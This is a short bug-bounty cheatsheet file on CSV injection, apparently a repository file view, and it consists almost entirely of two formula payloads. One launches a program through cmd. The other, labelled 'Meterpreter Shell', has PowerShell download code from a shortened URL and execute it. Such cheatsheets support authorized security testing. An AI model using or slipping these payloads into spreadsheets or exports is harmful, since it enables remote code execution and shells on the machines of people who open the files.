bugbounty-cheatsheet/cheatsheets/csv-injection.md

13 lines
155 B
Markdown
Raw Normal View History

2017-07-14 13:54:44 +00:00
## CSV Injection
**Newline character**
```
%0A-3+3+cmd|' /C calc'!D2
```
**Meterpreter Shell**
```
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
```